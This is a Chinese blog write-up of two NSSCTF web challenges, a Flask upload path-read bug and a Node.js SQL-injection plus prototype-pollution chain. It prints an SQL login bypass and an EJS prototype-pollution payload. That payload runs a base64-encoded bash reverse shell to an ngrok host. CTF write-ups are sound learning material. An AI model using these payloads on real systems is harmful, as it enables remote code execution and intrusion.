NSSCTF的web题目记录

最新推荐文章于 2024-05-30 11:53:48 发布
最新推荐文章于 2024-05-30 11:53:48 发布
阅读量307 收藏 1
点赞数
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/127179436
版权

[NISACTF 2022]babyupload

image-20220423220521330

image-20220423220526700

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)
# 创建一个表名为files 值为id 和 path 内容为text 并且 含有primary key
SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db(): #返回g对象的_database属性值
    g_db = getattr(g, '_database', None)
    if g_db is None:#如果存在
        g_db = g._database = sqlite3.connect("database.db")#就连接databae.db
    return g_db


@app.before_first_request
def setup():#删除database.db文件
    os.remove("database.db")
    cur = db().cursor()#获取游标
    cur.executescript(SCHEMA)#执行脚本


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file">
    <input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():#flask下载文件,将网站源码发送
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:#上传文件不存在重定向到/
        return redirect('/')
    file = request.files['file']#
    if "." in file.filename:#filename中有.就结束返回403
        return "Bad filename!", 403
    conn = db()#连接db
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))#将uid和filename写入数据库
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)#将文件保存在uploads/filename下
    return redirect('/file/' + uid)#重定向到/file/uid


@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))#查询文件路径
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])
#进行路径拼接print("2:",os.path.join('/aaaa','/bbbb','/ccccc.txt')) #不良写法习惯
    # / ccccc.txt
    # print("22:", os.path.join('/aaaa/', 'bbbb/', 'ccccc.txt'))  # 通常可以这样写
    # aaaa/bbb/ccccc.txt
    with open(os.path.join("uploads/", res[0]), "r") as f:#传入/flag可以读取,就变成了/flag
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8888)

image-20220423221146612

image-20220423221155647

[GKCTF 2021]easynode

读源码

const express = require('express');
const format = require('string-format');
//const {select, close} = require('./tools');
const app = new express();
var extend = require("js-extend").extend
const ejs = require('ejs');
//const {generateToken, verifyToken} = require('./encrypt');
var cookieParser = require('cookie-parser');
app.use(express.urlencoded({extended: true}));
app.use(express.static((__dirname + '/public/')));
app.use(cookieParser());

//生成一个safeQuery对象 let生成一个变量
let safeQuery = async (username, password) => {
//生成一个只读变量
    const waf = (str) => {
        // console.log(str);
        blacklist = ['\\', '\^', ')', '(', '\"', '\'']//定义黑名单
        blacklist.forEach(element => {
            if (str == element) {//如果传入的str等于黑名单中的值就把str替换为*
                str = "*";
            }
        });
        return str;//返回str
    }
//这里总共有两步操作首先是通过数组去绕过弱类型比较,在者是通过长度来绕过也就是i,当只有有*的时候它就会进行拼接操作,那么原先的数组就变成了字符串,这个时候,由于i已经足够大了,就算开始以字符串来进行挨个过滤,
    //也会导致admin'过滤不到,也就是说当存在多少个数组就会有多少个前面的字符过滤不到.下面有图
    const safeStr = (str) => {//
        for (let i = 0; i < str.length; i++) {//对str进行遍历
            if (waf(str[i]) == "*") {//如果str的为*
                //截取从零开始的前i个字符并在中间拼接上*
                str = str.slice(0, i) + "*" + str.slice(i + 1, str.length);
            }

        }
        return str;
    }

    username = safeStr(username);//对username和password进行过滤
    password = safeStr(password);
    let sql = format("select * from test where username = '{}' and password = '{}'", username.substr(0, 20), password.substr(0, 20));
    // console.log(sql);//进行sql查询,并且将js对象转换为json字符串在将json字符串转换回js对象
    result = JSON.parse(JSON.stringify(await select(sql)));
    return result;
}
//req请求体,res响应体
app.get('/', async (req, res) => {
    const html = await ejs.renderFile(__dirname + "/public/index.html")//渲染输出/public/index.html
    res.writeHead(200, {"Content-Type": "text/html"});//返回200响应头并定义响应头为
    res.end(html)//响应结束
})


app.post('/login', function (req, res, next) {

    let username = req.body.username;//req中的body的username
    let password = req.body.password;
    safeQuery(username, password).then(//调用safeQuery对象对username和password进行过滤
        result => {//then进行异步执行,先执行前面的,接着执行后面的
            if (result[0]) {
                const token = generateToken(username)//生成token
                res.json({//对body加json处理,传入token
                    "msg": "yes", "token": token
                });
            } else {
                res.json(
                    {"msg": "username or password wrong"}
                );
            }
        }
    ).then(close()).catch(err => {//接着关闭
        res.json({"msg": "something wrong!"});//如果出错就捕获错误
    });
})

//admin路由
app.get("/admin", async (req, res, next) => {
    const token = req.cookies.token//得到cookies的token
    let result = verifyToken(token);//验证token
    if (result != 'err') {//如果结果不等于err
        username = result
        var sql = `select board from board where username = '${username}'`;
        var query = JSON.parse(JSON.stringify(await select(sql).then(close())));
        board = JSON.parse(query[0].board);//解码第一条语句为js对象
        console.log(board);//
        const html = await ejs.renderFile(__dirname + "/public/admin.ejs", {board, username})
        res.writeHead(200, {"Content-Type": "text/html"});
        res.end(html)
    } else {
        res.json({'msg': 'stop!!!'});
    }
});
//addAdmin
app.post("/addAdmin", async (req, res, next) => {
    let username = req.body.username;
    let password = req.body.password;
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result != 'err') {
        gift = JSON.stringify({
            [username]: {
                name: "Blue-Eyes White Dragon",
                ATK: "3000",
                DEF: "2500",
                URL: "https://ftp.bmp.ovh/imgs/2021/06/f66c705bd748e034.jpg"
            }
        });
        var sql = format('INSERT INTO test (username, password) VALUES ("{}","{}") ', username, password);
        select(sql).then(close()).catch((err) => {
            console.log(err)
        });
        var sql = format('INSERT INTO board (username, board) VALUES (\'{}\',\'{}\') ', username, gift);
        console.log(sql);
        select(sql).then(close()).catch((err) => {
            console.log(err)
        });
        res.end('add admin successful!')
    } else {
        res.end('stop!!!');
    }
});


app.post("/adminDIV", async (req, res, next) => {
    const token = req.cookies.token

    var data = JSON.parse(req.body.data)

    let result = verifyToken(token);
    if (result != 'err') {
        username = result;
        var sql = 'select board from board';
        var query = JSON.parse(JSON.stringify(await select(sql).then(close())));
        board = JSON.parse(query[0].board);
        console.log(board);
        for (var key in data) {
            var addDIV = `{"${username}":{"${key}":"${data[key]}"}}`;
            //这里使用extend进行合并实际上是类似的合并方法,使用了json.这便使得__proto__不会被直接解析成为原型,从而产生原型链污染
            extend(board, JSON.parse(addDIV));
        }
        sql = `update board SET board = '${JSON.stringify(board)}' where username = '${username}'`
        select(sql).then(close()).catch((err) => {
            console.log(err)
        });
        res.json({"msg": 'addDiv successful!!!'});
    } else {
        res.end('nonono');
    }
});


app.listen(1337, () => {
    console.log(`App listening at port 1337`)
})

image-20220424231433080

username[]=admin'#&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=1&username[]=(&password=123456

login登录

image-20220425124231454

{"msg":"yes","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjpbImFkbWluJyMiLCIxIiwiMSIsIjEiLCIxIiwiMSIsIjEiLCIxIiwiMSIsIigiXSwiZXhwIjoxNjUwODYzNTQ3LCJpYXQiOjE2NTA4NjE3NDd9.2iXB8qLSvHTm4KNs7TRLNenf82wobE6p7hsawIMa9r8"}

那到token,接着去创建用户,拿着这个token

username=__proto__&password=123456

image-20220425124524381

拿__proto__的token

image-20220425124638478

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjoiX19wcm90b19fIiwiZXhwIjoxNjUwODYzNzk1LCJpYXQiOjE2NTA4NjE5OTV9.aPqkweKaRvIXpIhNFV9dNJdO4I_f9VK9oWz_klHIzqY

接着拿着token去adminDIV去污染data

data={"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5qcC5uZ3Jvay5pby8xNTQzMiAwPiYxIiA=|base64 -d|bash');var __tmp2"}

image-20220425130507130

image-20220425132624155

wanan0red
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Buuctf --hellow world
bygwys的博客
01-09 294
用AndroidKiller打卡 得出flag
BUUCTF中的HEllO WORLD
在Web和Reverse坑里游泳中。。。。
11-11 217
好不容易休息了,躺在床上睡了一整天。真不是我不行,996啊。
[NISACTF 2022]babyupload(wp)
wikey 的博客
03-30 520
有一个小问题,我们在尝试上传图片马也就是//php木马时,burp会自行改形式为image/jpeg图片内容,我们既然需要伪造//flag文件,就需要改相应的格式。如: text/plain。这道题学会了个新姿势就是当res[0]为绝对路径时,我们可以直接跳转到最后文件地址而不需要补齐界面的文件,直接跳转//flag界面。所以用burp修改文件名为 //flag,跳转就读取到//flag文件了。当res[0]为绝对路径时,打开的就是绝对路径,不会进行拼接。给了上传地址直接访问就可。
CTF练习题[WEB]-本地管理员
weixin_45246254的博客
10-11 3377
https://ctf.bugku.com/challenges/detail/id/79.html 拿到题目尝试登陆失败 提示IP禁止访问 抓包发现有注释信息 请求包添加 X-FORWARDED-FOR:127.0.0.1 Referer: localhost admin/test123 伪造本地IP,进行登录,获取flag
NSSCTF web刷题记录6
rev1ve的博客
11-21 510
引用了vm2,有JSON.parse解析,并且存在merge方法,clone调用了merge,存在原型链污染漏洞。直接去网上找相关漏洞,发现是CVE-2021-26120(说是此版本修复但也不知道为啥能用)路由下接收name参数,如果存在且值不为admin,将输出JWT加密的token值;路由接收参数token,然后进行解密,如果为admin返回flag。然后把密钥放到我们解密网站,验证成功,我们直接修改为admin。中,.匹配除了换行符以外的所有字符,postmanPOST发送即可。
NSSCTF web 刷题记录1
rev1ve的博客
09-04 1707
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
NSSCTF web 刷题记录2
rev1ve的博客
09-17 3190
源代码phpif(!|\&|\*|\?else{else{?':?"";if ((!break;break;?"";");?简单分析一下,首先是两个函数,功能分别为正则匹配一些字符;foreach循环检测每个值是否合法。然后就是swtich选择结构。我们思路是可以先看看hint有什么,为了绕过if条件判断,我们可以用%81去绕过,因为%81为不可见字符,escapeshellcmd又可以将不可见字符消除payload。
NSSCTF web刷题记录7
rev1ve的博客
12-11 363
将url的字符串拿去解码,得到json格式数据。打开题目发现是curl命令,提示填入url。读取下环境变量,得到flag。
NSSCTF web刷题记录3
rev1ve的博客
10-28 557
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
NSSCTF web记录
m0_64815693的博客
11-08 9343
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF web刷题记录5
rev1ve的博客
11-13 478
在Node.js中,"validator"是一个常用的数据验证库,用于验证和处理不同类型的数据。它提供了一组方便的函数和方法,用于验证字符串、数字、日期、URL、电子邮件等常见数据类型的有效性。express-validator中lodash在版本4.17.17以下存在原型链污染漏洞payload如下。
nssctf文件test
03-30
1
[SWPUCTF 2021 新生赛]traditional
03-15
[SWPUCTF 2021 新生赛]traditional
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8261
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Gartner发布电信运营商应对持续变化的网络安全环境指南:现代云安全网络安全的五大核心挑战
最新发布
lurenjia404的博客
05-30 508
所有组织的云和网络都面临着高级威胁。作为网络安全的关键参与者,电信运营商的 CIO 需要了解行业面临的挑战,并了解应采用哪些解决方案来实现方法的现代化。
构建坚不可摧的Web安全防线:深入剖析二阶注入与全面防御策略
weixin_43822401的博客
05-27 800
SQL注入攻击通过在用户输入中嵌入恶意SQL代码,企图让数据库执行这些非法命令,从而达到窃取、破坏或篡改数据的目的。
如何处理网安发出的网络安全监督检查限期整改通知
联蔚盘云的博客
05-27 393
近期,很多客户都收到了网安发出的限期整改通知。大家都比较关心的问题是,如何应对处理这些限期整改通知。后续是否有其他的影响,需要如何做进一步的优化整改和调整。今天就这些问题给大家做一些分享。
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值